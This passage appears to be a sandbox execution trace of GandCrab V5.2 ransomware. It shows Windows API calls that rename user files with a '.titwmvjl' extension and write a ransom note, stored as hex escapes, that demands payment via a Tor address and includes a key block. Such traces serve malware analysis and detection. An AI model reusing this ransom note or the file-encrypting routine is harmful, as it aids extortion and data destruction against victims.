lpOverlapped=0x0) returned 1 [0069.252] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.255] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.256] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.256] CloseHandle (hObject=0x2b4) returned 1 [0069.258] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7cidl.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7ciDl.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7cidl.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0069.259] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.259] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.259] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0069.259] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0069.259] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Adobe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe" [0069.259] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\" [0069.259] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.260] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.260] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.260] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.260] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.260] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.260] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.260] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\\\TITWMVJL-DECRYPT.txt") returned 65 [0069.261] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0069.263] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x